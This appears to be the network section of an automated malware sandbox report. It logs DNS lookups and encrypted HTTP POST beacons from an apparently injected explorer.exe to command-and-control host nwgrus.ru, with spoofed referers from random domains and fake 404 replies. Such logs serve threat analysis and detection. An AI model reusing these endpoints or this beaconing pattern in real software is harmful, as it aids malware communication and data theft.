                                                                                                                          Oct 8, 2024 18:26:37.992496967 CEST4436146723.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:54.063692093 CEST6146980192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:54.069727898 CEST8061469190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:54.069921017 CEST6146980192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:54.070030928 CEST6146980192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:54.070061922 CEST6146980192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:54.075407982 CEST8061469190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:54.075443983 CEST8061469190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:55.069500923 CEST8061469190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:55.070358038 CEST8061469190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:55.070440054 CEST6146980192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:55.071645975 CEST6146980192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:55.076503992 CEST8061469190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:55.365998030 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:55.366044998 CEST4436147023.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:55.366126060 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:55.366416931 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:55.366426945 CEST4436147023.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:56.005043983 CEST4436147023.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:56.005121946 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:56.006145954 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:56.006151915 CEST4436147023.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:56.006352901 CEST4436147023.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:56.007095098 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:56.007134914 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:56.007152081 CEST4436147023.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:56.524872065 CEST4436147023.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:56.524969101 CEST4436147023.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:56.525044918 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:56.525190115 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:56.525208950 CEST4436147023.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:56.525219917 CEST61470443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:56.525224924 CEST4436147023.145.40.168192.168.2.6

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 8, 2024 18:23:24.388371944 CEST6104153192.168.2.61.1.1.1
                                                                                                                          Oct 8, 2024 18:23:25.392151117 CEST6104153192.168.2.61.1.1.1
                                                                                                                          Oct 8, 2024 18:23:26.407597065 CEST6104153192.168.2.61.1.1.1
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST53610411.1.1.1192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST53610411.1.1.1192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST53610411.1.1.1192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:29.461184025 CEST5360404162.159.36.2192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:30.641814947 CEST4986253192.168.2.61.1.1.1
                                                                                                                          Oct 8, 2024 18:23:30.650778055 CEST53498621.1.1.1192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:33.239840984 CEST6335553192.168.2.61.1.1.1
                                                                                                                          Oct 8, 2024 18:23:34.235874891 CEST6335553192.168.2.61.1.1.1
                                                                                                                          Oct 8, 2024 18:23:35.235821962 CEST6335553192.168.2.61.1.1.1
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST53633551.1.1.1192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST53633551.1.1.1192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST53633551.1.1.1192.168.2.6
                                                                                                                          Oct 8, 2024 18:24:19.663417101 CEST6097653192.168.2.61.1.1.1
                                                                                                                          Oct 8, 2024 18:24:19.708350897 CEST53609761.1.1.1192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:15.947964907 CEST6188553192.168.2.61.1.1.1
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST53618851.1.1.1192.168.2.6

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Oct 8, 2024 18:23:24.388371944 CEST192.168.2.61.1.1.10x2a83Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:25.392151117 CEST192.168.2.61.1.1.10x2a83Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.407597065 CEST192.168.2.61.1.1.10x2a83Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:30.641814947 CEST192.168.2.61.1.1.10xbd58Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:33.239840984 CEST192.168.2.61.1.1.10xea0eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:34.235874891 CEST192.168.2.61.1.1.10xea0eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.235821962 CEST192.168.2.61.1.1.10xea0eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:24:19.663417101 CEST192.168.2.61.1.1.10x4d31Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:15.947964907 CEST192.168.2.61.1.1.10x9d3aStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Oct 8, 2024 18:23:15.670839071 CEST1.1.1.1192.168.2.60x4cdbNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:15.670839071 CEST1.1.1.1192.168.2.60x4cdbNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru160.177.223.165A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750308037 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru160.177.223.165A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750391006 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru160.177.223.165A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:26.750401974 CEST1.1.1.1192.168.2.60x2a83No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:30.650778055 CEST1.1.1.1192.168.2.60xbd58Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru160.177.223.165A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.317315102 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru160.177.223.165A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318294048 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru160.177.223.165A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:23:35.318507910 CEST1.1.1.1192.168.2.60xea0eNo error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:24:15.632531881 CEST1.1.1.1192.168.2.60x158cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:24:15.632531881 CEST1.1.1.1192.168.2.60x158cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:24:19.708350897 CEST1.1.1.1192.168.2.60x4d31No error (0)ninjahallnews.com23.145.40.168A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru160.177.223.165A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                          Oct 8, 2024 18:26:16.345263958 CEST1.1.1.1192.168.2.60x9d3aNo error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • 23.145.40.164
                                                                                                                          • https:
                                                                                                                            • ninjahallnews.com
                                                                                                                          • ajlkwtshfrbwcj.com
                                                                                                                            • nwgrus.ru
                                                                                                                          • lmqmhcivixmahfcs.com
                                                                                                                          • eqlgmwxqcstymthl.net
                                                                                                                          • uajyyjejyvvbvl.org
                                                                                                                          • fcbqaeiodmerjjce.net
                                                                                                                          • uqyhewsqgme.net
                                                                                                                          • mcnivsvqoyuiyi.com
                                                                                                                          • snlvxdcuggcgtr.com
                                                                                                                          • rcayuliatuydngjp.net
                                                                                                                          • gxhoywsjvhdimib.org
                                                                                                                          • hnkujwopesopy.org
                                                                                                                          • gcsggiqiypjqctoh.net
                                                                                                                          • swrrssmuceopwlwv.com
                                                                                                                          • mcrofbggconl.net
                                                                                                                          • euadhmjtligscip.net
                                                                                                                          • oratgvwctswjsrg.com
                                                                                                                          • jukynnhymwnwl.org
                                                                                                                          • pithrelifcqallw.net
                                                                                                                          • kdahnseejtpvc.org
                                                                                                                          • umfnnmmrmjakpw.org
                                                                                                                          • hjaonoqsbnhieap.net
                                                                                                                          • kfntyderqkkh.net
                                                                                                                          • bpuffphxcjr.net
                                                                                                                          • evwfmjkyovghciew.net
                                                                                                                          • dxitdoiirfghic.org
                                                                                                                          • goilbsuxbgu.com
                                                                                                                          • bmhunjcauidhfjas.com
                                                                                                                          • ehqwwnwmwdh.net
                                                                                                                          • oawojikvjxqxudp.com
                                                                                                                          • xlurbvunmfixk.org
                                                                                                                          • kamxftfsfgaby.com
                                                                                                                          • oqmylvnapebvw.com
                                                                                                                          • hyeljwvkydclsem.net
                                                                                                                          • ovnkboilnwpev.org
                                                                                                                          • elavhytildeantb.net
                                                                                                                          • qvpxnipvuyciicri.org
                                                                                                                          • nsxfaafbvsvkfwb.net
                                                                                                                          • euvycibbjmraba.com
                                                                                                                          • istrtdmsewdifyn.com
                                                                                                                          • chihuprqnvownoad.org
                                                                                                                          • muicqrvubdhbsy.org
                                                                                                                          • xfevllovssfdblv.com

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.649836160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:26.761815071 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://ajlkwtshfrbwcj.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 299
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:26.761830091 CEST299OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 24 fb be
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vuI$jLwYM7]0Ae]U&0Y9t@FK8Nm5,6mDXGG5KL*^Pv1@g0.RwAD+
                                                                                                                          Oct 8, 2024 18:23:27.749219894 CEST152INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:27 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 04 00 00 00 72 e8 87 ec
                                                                                                                          Data Ascii: r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.649842160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:27.790044069 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://lmqmhcivixmahfcs.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 350
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:27.790143013 CEST350OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 65 34 f8 83
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vue4s@a:.?owEvR>V3?Rv_OOY\&#5vOo:wL[>o5%V'&UyDYczyKC#
                                                                                                                          Oct 8, 2024 18:23:28.876461029 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:28 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.649843160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:28.886717081 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://eqlgmwxqcstymthl.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 364
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:28.886749983 CEST364OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 31 0d ee e6
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu1j]wkdNn4 :8zaa?T1mM?JEB'\CFN'W6xNh9)DSGP(Ws@:
                                                                                                                          Oct 8, 2024 18:23:29.763870001 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:29 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
